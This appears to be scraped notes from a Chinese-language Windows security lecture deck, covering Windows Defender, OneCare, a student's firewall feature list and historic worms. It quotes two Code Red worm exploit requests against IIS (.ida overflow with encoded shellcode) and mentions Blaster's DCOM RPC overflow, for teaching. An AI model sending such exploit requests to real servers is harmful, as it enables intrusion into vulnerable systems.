08a-Windows安全解读.pptVIP

/zh-cn/library/ee290833.aspx * * / * Windows Defender, previously known as Microsoft AntiSpyware, is a software product from Microsoft designed to prevent, remove and quarantine spyware in Microsoft Windows. It is part of Windows Vista and available as a free download for previous supported versions of Windows. * Windows Live OneCare, previously known as Windows OneCare Live and formerly code-named A1, is a computer security service developed by Microsoft for some of its Windows operating systems. An annual subscription costs USD $49.95, which can be used on up to three computers. * 本人利用课余时间，做出了一个完整的防火墙，包括驱动程序和界面的完整实现。能够实现的功能： 1。列举出关于机器的一些信息，如操作系统，CPU型号，网卡型号，等等。 2。列出你收到的数据报数量，发出数包的数量，网络利用率曲线图（和任务管理器里面的CPU利用率类似）等等。 3。纪录安全日志等等。 4。列出你的机器开的错又端口，以及相关的进程等等 5。IP规则编辑器，可以自定义规则等等。 6。根据IP规则检查通过的数据包，决定他们是否可以通过网络。 7。服务管理器，可以编辑你的系统上的服务的启动，暂停，停止等等，并且列出人性化的提示信息。 8。应用程序监视器，可以控制你的应用程序是否能够访问网络，如果有新的应用程序访问网络，将弹出对话框询问用户时候允许其访问网络。 9。应用程序规则编辑器，可以决定是否让你的应用程序访问网络。 10。软件设置。如自动启动，日志自动记录，有攻击时是否报警等等。 * /resources/ndisimfaq.htm#NDISImPlatforms /bbs/read.php?tid=3900 * I : GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 II : GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Blaster worm The worm spread by exploiting a buffer overflow in the DCOM RPC service on the affected operating systems The worm contains two messages hi